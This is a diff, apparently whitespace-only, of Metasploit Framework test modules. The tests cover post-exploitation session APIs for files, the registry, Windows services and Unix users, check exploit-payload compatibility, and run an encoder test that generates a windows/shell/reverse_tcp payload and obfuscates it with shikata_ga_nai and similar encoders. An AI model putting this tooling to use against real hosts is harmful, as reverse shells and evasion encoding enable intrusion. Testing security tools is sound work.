res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
it "should do md5 and sha1 of files" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local))
remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
res &&= (remote_md5 == local_md5)
end
if res
remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local))
remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
res &&= (remote_md5 == local_md5)
end
session.fs.file.rm(remote)
res
end
session.fs.file.rm(remote)
res
end
end
end
=begin
# Sniffer currently crashes on any OS that requires driver signing,
# i.e. everything vista and newer
#
# Disable loading it for now to make it through the rest of the tests.
#
def test_sniffer
begin
session.core.use "sniffer"
rescue
# Not all meterpreters have a sniffer extension, don't count it
# against them.
return
end
# Sniffer currently crashes on any OS that requires driver signing,
# i.e. everything vista and newer
#
# Disable loading it for now to make it through the rest of the tests.
#
def test_sniffer
begin
session.core.use "sniffer"
rescue
# Not all meterpreters have a sniffer extension, don't count it
# against them.
return
end
it "should list interfaces for sniffing" do
session.sniffer.interfaces.kind_of? Array
end
it "should list interfaces for sniffing" do
session.sniffer.interfaces.kind_of? Array
end
# XXX: how do we test this more thoroughly in a generic way?
end
# XXX: how do we test this more thoroughly in a generic way?
end
=end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
session.fs.dir.chdir(@old_pwd)
super
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
session.fs.dir.chdir(@old_pwd)
super
end
protected
def create_directory(name)
res = true
def create_directory(name)
res = true
session.fs.dir.mkdir(name)
entries = session.fs.dir.entries
res &&= entries.include?(name)
res &&= session.fs.file.stat(name).directory?
if res
vprint_status("Directory created successfully")
end
session.fs.dir.mkdir(name)
entries = session.fs.dir.entries
res &&= entries.include?(name)
res &&= session.fs.file.stat(name).directory?
if res
vprint_status("Directory created successfully")
end
res
end
res
end
end
test/modules/post/test/railgun_reverse_lookups.rb
+60 -60
View File
@@ -15,83 +15,83 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Railgun
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Railgun
def initialize(info={})
super( update_info( info,
'Name' => 'railgun_testing',
'Description' => %q{ This module will test railgun code used in post modules},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
))
def initialize(info={})
super( update_info( info,
'Name' => 'railgun_testing',
'Description' => %q{ This module will test railgun code used in post modules},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
))
register_options(
[
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class)
register_options(
[
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class)
end
end
def test_static
def test_static
it "should return a constant name given a const and a filter" do
ret = true
results = select_const_names(4, /^SERVICE/)
it "should return a constant name given a const and a filter" do
ret = true
results = select_const_names(4, /^SERVICE/)
ret &&= !!(results.kind_of? Array)
# All of the returned values should match the filter and have the same value
results.each { |const|
ret &&= !!(const =~ /^SERVICE/)
ret &&= !!(session.railgun.constant_manager.parse(const) == 4)
}
ret &&= !!(results.kind_of? Array)
# All of the returned values should match the filter and have the same value
results.each { |const|
ret &&= !!(const =~ /^SERVICE/)
ret &&= !!(session.railgun.constant_manager.parse(const) == 4)
}
# Should include things that match the filter and the value
ret &&= !!(results.include? "SERVICE_RUNNING")
# Should NOT include things that match the value but not the filter
ret &&= !!(not results.include? "CLONE_FLAG_ENTITY")
# Should include things that match the filter and the value
ret &&= !!(results.include? "SERVICE_RUNNING")
# Should NOT include things that match the value but not the filter
ret &&= !!(not results.include? "CLONE_FLAG_ENTITY")
ret
end
ret
end
it "should return an error string given an error code" do
ret = true
results = lookup_error(0x420, /^ERROR_SERVICE/)
ret &&= !!(results.kind_of? Array)
ret &&= !!(results.length == 1)
it "should return an error string given an error code" do
ret = true
results = lookup_error(0x420, /^ERROR_SERVICE/)
ret &&= !!(results.kind_of? Array)
ret &&= !!(results.length == 1)
ret
end
ret
end
end
end
def test_datastore
def test_datastore
if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do
ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do
ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
ret
end
end
ret
end
end
if (datastore["ERR_CODE"])
it "should look up arbitrary error codes" do
ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
if (datastore["ERR_CODE"])
it "should look up arbitrary error codes" do
ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
ret
end
end
ret
end
end
end
end
end
test/modules/post/test/registry.rb
+112 -112
View File
@@ -15,141 +15,141 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
'Name' => 'registry_post_testing',
'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original
'egypt', # PostTest conversion
],
'Platform' => [ 'windows' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'registry_post_testing',
'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original
'egypt', # PostTest conversion
],
'Platform' => [ 'windows' ]
))
end
def test_0_registry_read
pending "should evaluate key existence" do
# these methods are not implemented
k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
def test_0_registry_read
pending "should evaluate key existence" do
# these methods are not implemented
k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
(k_exists && !k_dne)
end
(k_exists && !k_dne)
end
pending "should evaluate value existence" do
# these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
pending "should evaluate value existence" do
# these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
(v_exists && !v_dne)
end
(v_exists && !v_dne)
end
it "should read values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"])
ret &&= !!(valinfo["Type"])
it "should read values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"])
ret &&= !!(valinfo["Type"])
valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"] == valdata)
valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"] == valdata)
ret
end
ret
end
it "should return normalized values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
if (valinfo.nil?)
ret = false
else
# type == 2 means string
ret &&= !!(valinfo["Type"] == 2)
ret &&= !!(valinfo["Data"].kind_of? String)
it "should return normalized values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
if (valinfo.nil?)
ret = false
else
# type == 2 means string
ret &&= !!(valinfo["Type"] == 2)
ret &&= !!(valinfo["Data"].kind_of? String)
valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair")
if (valinfo.nil?)
ret = false
else
# type == 4 means DWORD
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
end
end
valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair")
if (valinfo.nil?)
ret = false
else
# type == 4 means DWORD
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
end
end
ret
end
ret
end
it "should enumerate keys and values" do
ret = true
# Has no keys, should return an empty Array
keys = registry_enumkeys(%q#HKCU\Environment#)
ret &&= (keys.kind_of? Array)
it "should enumerate keys and values" do
ret = true
# Has no keys, should return an empty Array
keys = registry_enumkeys(%q#HKCU\Environment#)
ret &&= (keys.kind_of? Array)
vals = registry_enumvals(%q#HKCU\Environment#)
ret &&= (vals.kind_of? Array)
ret &&= (vals.count > 0)
ret &&= (vals.include? "TEMP")
vals = registry_enumvals(%q#HKCU\Environment#)
ret &&= (vals.kind_of? Array)
ret &&= (vals.count > 0)
ret &&= (vals.include? "TEMP")
ret
end
ret
end
end
end
def test_1_registry_write
it "should create keys" do
ret = registry_createkey(%q#HKCU\test_key#)
end
def test_1_registry_write
it "should create keys" do
ret = registry_createkey(%q#HKCU\test_key#)
end
it "should write REG_SZ values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
if (valinfo.nil?)
ret = false
else
# type == REG_SZ means string
ret &&= !!(valinfo["Type"] == 1)
ret &&= !!(valinfo["Data"].kind_of? String)
ret &&= !!(valinfo["Data"] == "str!")
end
it "should write REG_SZ values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
if (valinfo.nil?)
ret = false
else
# type == REG_SZ means string
ret &&= !!(valinfo["Type"] == 1)
ret &&= !!(valinfo["Data"].kind_of? String)
ret &&= !!(valinfo["Data"] == "str!")
end
ret
end
ret
end
it "should write REG_DWORD values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
if (valinfo.nil?)
ret = false
else
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
ret &&= !!(valinfo["Data"] == 1234)
end
ret
end
it "should write REG_DWORD values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
if (valinfo.nil?)
ret = false
else
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
ret &&= !!(valinfo["Data"] == 1234)
end
ret
end
it "should delete keys" do
ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
# getvalinfo should return nil for a non-existent key
ret &&= (valinfo.nil?)
ret &&= registry_deletekey(%q#HKCU\test_key#)
# Deleting the key should delete all its values
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
ret &&= (valinfo.nil?)
it "should delete keys" do
ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
# getvalinfo should return nil for a non-existent key
ret &&= (valinfo.nil?)
ret &&= registry_deletekey(%q#HKCU\test_key#)
# Deleting the key should delete all its values
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
ret &&= (valinfo.nil?)
ret
end
ret
end
end
end
end
test/modules/post/test/services.rb
+142 -142
View File
@@ -11,176 +11,176 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Services
include Msf::Post::Windows::Services
include Msf::ModuleTest::PostTest
include Msf::ModuleTest::PostTest
def initialize(info={})
super( update_info( info,
'Name' => 'Test Post::Windows::Services',
'Description' => %q{ This module will test windows services methods within a shell},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith', 'egypt' ],
'Version' => '$Revision: 11663 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
register_options(
[
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
["auto", "manual", "disable"]
]),
], self.class)
def initialize(info={})
super( update_info( info,
'Name' => 'Test Post::Windows::Services',
'Description' => %q{ This module will test windows services methods within a shell},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith', 'egypt' ],
'Version' => '$Revision: 11663 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
register_options(
[
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
["auto", "manual", "disable"]
]),
], self.class)
end
end
def test_start
it "should start #{datastore["SSERVICE"]}" do
ret = true
results = service_start(datastore['SSERVICE'])
if results != 0
# Failed the first time, try to stop it first, then try again
service_stop(datastore['SSERVICE'])
results = service_start(datastore['SSERVICE'])
end
ret &&= (results == 0)
def test_start
it "should start #{datastore["SSERVICE"]}" do
ret = true
results = service_start(datastore['SSERVICE'])
if results != 0
# Failed the first time, try to stop it first, then try again
service_stop(datastore['SSERVICE'])
results = service_start(datastore['SSERVICE'])
end
ret &&= (results == 0)
ret
end
it "should stop #{datastore["SSERVICE"]}" do
ret = true
results = service_stop(datastore['SSERVICE'])
ret &&= (results == 0)
ret
end
it "should stop #{datastore["SSERVICE"]}" do
ret = true
results = service_stop(datastore['SSERVICE'])
ret &&= (results == 0)
ret
end
end
ret
end
end
def test_list
it "should list services" do
ret = true
results = service_list
def test_list
it "should list services" do
ret = true
results = service_list
ret &&= results.kind_of? Array
ret &&= results.length > 0
ret &&= results.include? datastore["QSERVICE"]
ret &&= results.kind_of? Array
ret &&= results.length > 0
ret &&= results.include? datastore["QSERVICE"]
ret
end
end
ret
end
end
def test_info
it "should return info on a given service" do
ret = true
results = service_info(datastore['QSERVICE'])
def test_info
it "should return info on a given service" do
ret = true
results = service_info(datastore['QSERVICE'])
ret &&= results.kind_of? Hash
if ret
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == "Windows Management Instrumentation")
ret &&= results.has_key? "Startup"
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
end
ret &&= results.kind_of? Hash
if ret
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == "Windows Management Instrumentation")
ret &&= results.has_key? "Startup"
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
end
ret
end
end
ret
end
end
def test_create
it "should create a service" do
mode = case datastore["MODE"]
when "disable"; 4
when "manual"; 3
when "auto"; 2
else; 2
end
ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode)
def test_create
it "should create a service" do
mode = case datastore["MODE"]
when "disable"; 4
when "manual"; 3
when "auto"; 2
else; 2
end
ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode)
ret
end
ret
end
it "should return info on the newly-created service" do
ret = true
results = service_info(datastore['NSERVICE'])
it "should return info on the newly-created service" do
ret = true
results = service_info(datastore['NSERVICE'])
ret &&= results.kind_of? Hash
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == datastore["DNAME"])
ret &&= results.has_key? "Startup"
ret &&= (results["Startup"].downcase == datastore["MODE"])
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
ret &&= results.kind_of? Hash
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == datastore["DNAME"])
ret &&= results.has_key? "Startup"
ret &&= (results["Startup"].downcase == datastore["MODE"])
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
ret
end
ret
end
it "should delete the new service" do
ret = service_delete(datastore['NSERVICE'])
it "should delete the new service" do
ret = service_delete(datastore['NSERVICE'])
ret
end
end
ret
end
end
=begin
def run
blab = datastore['VERBOSE']
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type}")
print_status("Verbosity is set to #{blab.to_s}")
print_status("Don't be surprised to see some errors as the script is faster")
print_line("than the windows SCM, just make sure the errors are sane. You can")
print_line("set VERBOSE to true to see more details")
def run
blab = datastore['VERBOSE']
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type}")
print_status("Verbosity is set to #{blab.to_s}")
print_status("Don't be surprised to see some errors as the script is faster")
print_line("than the windows SCM, just make sure the errors are sane. You can")
print_line("set VERBOSE to true to see more details")
print_status()
print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}")
results = service_query_ex(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}")
results = service_query_ex(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}")
results = service_query_config(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}")
results = service_query_config(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " +
"to #{datastore['MODE']}")
results = service_change_startup(datastore['QSERVICE'],datastore['MODE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " +
"to #{datastore['MODE']}")
results = service_change_startup(datastore['QSERVICE'],datastore['MODE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}")
results = service_start(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status("Sleeping to give the service a chance to start")
select(nil, nil, nil, 2) # give the service time to start, reduces false negatives
print_status()
print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}")
results = service_start(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status("Sleeping to give the service a chance to start")
select(nil, nil, nil, 2) # give the service time to start, reduces false negatives
print_status()
print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}")
results = service_stop(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}")
results = service_stop(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}")
results = service_delete(datastore['NSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("Testing complete.")
end
print_status()
print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}")
results = service_delete(datastore['NSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("Testing complete.")
end
=end
end
test/modules/post/test/unix.rb
+32 -32
View File
@@ -9,42 +9,42 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::Common
include Msf::ModuleTest::PostTest
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote Unix System Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote Unix System Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def test_unix
it "should list users" do
ret = true
users = get_users
ret &&= users.kind_of? Array
ret &&= users.length > 0
have_root = false
if ret
users.each { |u|
next unless u[:name] == "root"
have_root = true
}
end
ret
ret &&= have_root
def test_unix
it "should list users" do
ret = true
users = get_users
ret &&= users.kind_of? Array
ret &&= users.length > 0
have_root = false
if ret
users.each { |u|
next unless u[:name] == "root"
have_root = true
}
end
ret
ret &&= have_root
ret
end
ret
end
end
end
end
test/tests/00_create_all_modules_test.rb
+7 -7
View File
@@ -1,12 +1,12 @@
require 'testbase'
describe Msf::Simple::Framework do
$msf.modules.each_module do |name, mod|
ref = name
klass = mod
it "should be able create #{ref}" do
e = $msf.modules.create(ref)
$msf.modules.each_module do |name, mod|
ref = name
klass = mod
it "should be able create #{ref}" do
e = $msf.modules.create(ref)
e.should_not == nil
end
end
end
end
end
test/tests/01_all_exploits_have_payloads_test.rb
+10 -10
View File
@@ -1,14 +1,14 @@
require 'testbase'
describe Msf::Simple::Framework do
$msf.exploits.each_module do |name, mod|
e = $msf.exploits.create(name)
e.targets.each_with_index do |t, idx|
it "#{name} target #{idx} should have compatible payloads" do
e.datastore['TARGET'] = idx
r = e.compatible_payloads
r.length.should_not == 0
end
end
end
$msf.exploits.each_module do |name, mod|
e = $msf.exploits.create(name)
e.targets.each_with_index do |t, idx|
it "#{name} target #{idx} should have compatible payloads" do
e.datastore['TARGET'] = idx
r = e.compatible_payloads
r.length.should_not == 0
end
end
end
end
test/tests/test_encoders.rb
+66 -66
View File
@@ -6,7 +6,7 @@
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
@@ -20,100 +20,100 @@ $msf = Msf::Simple::Framework.create
EXPLOITS = $msf.exploits
def print_line( message )
$stdout.puts( message )
$stdout.puts( message )
end
def format_badchars( badchars )
str = ''
if( badchars )
badchars.each_byte do | b |
str << "\\x%02X" % [ b ]
end
end
str
str = ''
if( badchars )
badchars.each_byte do | b |
str << "\\x%02X" % [ b ]
end
end
str
end
def encoder_v_payload( encoder_name, payload, verbose=false )
success = 0
fail = 0
EXPLOITS.each_module do | name, mod |
exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
begin
encoder = $msf.encoders.create( encoder_name )
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
success += 1
rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
fail += 1
end
end
return [ success, fail ]
success = 0
fail = 0
EXPLOITS.each_module do | name, mod |
exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
begin
encoder = $msf.encoders.create( encoder_name )
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
success += 1
rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
fail += 1
end
end
return [ success, fail ]
end
def generate_payload( name )
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444'
# set options for an exec payload
payload.datastore['CMD'] = 'calc'
# set generic options
payload.datastore['EXITFUNC'] = 'thread'
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444'
# set options for an exec payload
payload.datastore['CMD'] = 'calc'
# set generic options
payload.datastore['EXITFUNC'] = 'thread'
return payload.generate
return payload.generate
end
def run( encoders, payload_name, verbose=false )
payload = generate_payload( payload_name )
payload = generate_payload( payload_name )
table = Rex::Ui::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
)
table = Rex::Ui::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
)
encoders.each do | encoder_name |
encoders.each do | encoder_name |
success, fail = encoder_v_payload( encoder_name, payload, verbose )
success, fail = encoder_v_payload( encoder_name, payload, verbose )
table << [ encoder_name, success, fail ]
end
table << [ encoder_name, success, fail ]
end
return table
return table
end
if( $0 == __FILE__ )
print_line( "[+] Starting.\n" )
print_line( "[+] Starting.\n" )
encoders = [
'x86/bloxor',
'x86/shikata_ga_nai',
'x86/jmp_call_additive',
'x86/fnstenv_mov',
'x86/countdown',
'x86/call4_dword_xor'
]
encoders = [
'x86/bloxor',
'x86/shikata_ga_nai',
'x86/jmp_call_additive',
'x86/fnstenv_mov',
'x86/countdown',
'x86/call4_dword_xor'
]
payload_name = 'windows/shell/reverse_tcp'
verbose = false
result_table = run( encoders, payload_name, verbose )
payload_name = 'windows/shell/reverse_tcp'
verbose = false
result_table = run( encoders, payload_name, verbose )
print_line( "\n\n#{result_table.to_s}\n\n" )
print_line( "\n\n#{result_table.to_s}\n\n" )
print_line( "[+] Finished.\n" )
print_line( "[+] Finished.\n" )
end